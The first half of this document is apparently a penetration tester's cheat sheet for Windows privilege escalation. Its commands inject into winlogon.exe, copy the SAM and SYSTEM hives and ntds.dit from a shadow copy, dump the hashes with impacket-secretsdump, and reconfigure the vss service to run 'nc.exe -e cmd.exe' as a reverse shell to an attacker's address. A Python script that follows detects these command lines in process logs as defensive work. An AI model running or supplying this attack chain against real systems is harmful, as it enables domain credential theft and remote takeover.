
Windows Local Privilege Escalation

SeDebugPrivilege

Inject into a privileged process such as winlogon.exe (ProcessInjection) so the adopt binary is loaded in that process's context.

WinLogon PID: 3488

Adopt binary: adopt.exe

PS /home/bobbuilderbob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe

SeImpersonatePrivilege

Web service accounts (IIS application pools) usually have this privilege enabled.

  • GodPotato or PrintSpoofer for privesc.

Backup Operators

PS /home/bobbuilderbob> cd c:\temp
PS /temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
PS /temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> diskshadow.exe /s c:\temp\diskshadow.txt

Through Evil-WinRM (its upload/download commands move files). The drive letter used below (E:) must match the one exposed in the diskshadow script.

PS /home/bobbuilderbob> upload disk.txt C:\Windows\Temp\disk.txt
PS /home/bobbuilderbob> diskshadow.exe /s C:\Windows\Temp\disk.txt
PS /home/bobbuilderbob> E:
PS /home/bobbuilderbob> reg save hklm\system c:\windows\temp\system.bak
PS /home/bobbuilderbob> reg save hklm\sam c:\windows\temp\sam.bak
PS /home/bobbuilderbob> upload ./SeBackupPrivilegeCmdLets.dll
PS /home/bobbuilderbob> upload ./SeBackupPrivilegeUtils.dll
PS /home/bobbuilderbob> Import-Module .\SeBackupPrivilegeUtils.dll
PS /home/bobbuilderbob> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS /home/bobbuilderbob> Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
PS /home/bobbuilderbob> cd c:\windows\temp
PS /windows/temp> download ntds.dit
PS /windows/temp> download sam.bak
PS /windows/temp> download system.bak

Then, on your Linux machine, use the three downloaded files to dump the hashes:

bobbuilder:/home# impacket-secretsdump -ntds ntds.dit -system system.bak -sam sam.bak LOCAL -outputfile ntlm-extract

Server Operators

PS /home/bobbuilderbob> upload /usr/share/windows-resources/binaries/nc.exe
PS /home/bobbuilderbob> sc.exe config vss binPath= "C:\Path\nc.exe -e cmd.exe ip 1234"
PS /home/bobbuilderbob> sc.exe stop vss
PS /home/bobbuilderbob> sc.exe start vss
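Detection logic for the Backup Operators and Server Operators workflows above, written from the defender's side as an added example that is not part of these notes. It assumes process-creation records with the field names Sysmon Event ID 1 and Security 4688 use (Image, CommandLine, User); the sample records are constructed, not real telemetry.

```python
"""Flag the command lines the notes above rely on (scripted diskshadow, reg save
of SAM/SYSTEM, ntds.dit access, sc config binPath=) in process-creation records
and correlate them per user. Added example; assumes Sysmon 1 / 4688 field names."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set


@dataclass(frozen=True)
class Finding:
    rule: str
    user: str
    command_line: str


# (rule name, regex on the image file name, regex on the command line).
# Everything matches case-insensitively: Windows paths, hive names and sc
# arguments all are.
RULES = [
    # diskshadow in scripted mode (/s <file>), the way the notes expose a volume.
    ("diskshadow_scripted", r"^diskshadow\.exe$", r"(^|\s)/s\s+\S+"),
    # reg save of the SAM or SYSTEM hive to a file.
    ("hive_save_sam_or_system", r"^reg\.exe$",
     r"\bsave\b.*\b(hklm|hkey_local_machine)\\(sam|system)\b"),
    # Any command line naming ntds.dit. Image-agnostic on purpose: the
    # Copy-FileSeBackupPrivilege cmdlet runs inside the PowerShell host and never
    # spawns a process, so that text arrives via script-block logging (4104),
    # not 4688; feeding those records through the same matcher works.
    ("ntds_dit_access", r".*", r"\bntds\.dit\b"),
    # Service binary path rewritten with: sc config <svc> binPath= ...
    ("service_binpath_change", r"^sc\.exe$", r"\bconfig\b.*\bbinpath=\s*\S"),
]
_COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I))
             for name, img, cmd in RULES]


def image_name(path: str) -> str:
    """File-name part of an image path; tolerates forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def evaluate(event: Dict[str, str]) -> List[Finding]:
    """Every rule matching one record, in RULES order."""
    name = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    user = event.get("User", "?")
    return [Finding(rule, user, cmd)
            for rule, img_re, cmd_re in _COMPILED
            if img_re.search(name) and cmd_re.search(cmd)]


def scan(events: Iterable[Dict[str, str]]) -> List[Finding]:
    """Run every record through evaluate() and flatten the findings."""
    out: List[Finding] = []
    for ev in events:
        out.extend(evaluate(ev))
    return out


def correlate(findings: Iterable[Finding], min_rules: int = 2) -> Set[str]:
    """Users who tripped at least min_rules distinct rules. A single hit is
    often a backup job or an admin; a chain of them matches the workflow."""
    per_user = defaultdict(set)
    for f in findings:
        per_user[f.user].add(f.rule)
    return {u for u, rules in per_user.items() if len(rules) >= min_rules}


# Constructed sample records (hypothetical users and paths, not real data).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe /s C:\Windows\Temp\disk.txt",
     "User": r"CORP\backupsvc"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam c:\windows\temp\sam.bak",
     "User": r"CORP\backupsvc"},
    {"Image": r"C:\Windows\System32\reg.exe",          # benign: a query, not a save
     "CommandLine": r"reg query hklm\system\currentcontrolset\services",
     "User": r"CORP\admin"},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc.exe config vss binPath= "C:\Users\Public\svc.exe"',
     "User": r"CORP\svcop"},
    {"Image": r"C:\Windows\System32\sc.exe",           # benign: status check
     "CommandLine": r"sc.exe query vss",
     "User": r"CORP\admin"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit",
     "User": r"CORP\backupsvc"},
]

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for h in hits:
        print(f"[{h.rule}] {h.user}: {h.command_line}")
    print("escalate:", sorted(correlate(hits)))
```

Under an Evil-WinRM session the parent of diskshadow.exe, reg.exe and sc.exe is wsmprovhost.exe, so a parent-process field, where available, is a cheap extra filter; diskshadow and sc config are also used legitimately, which is why correlate() only escalates a user who chains several of the rules rather than any single hit.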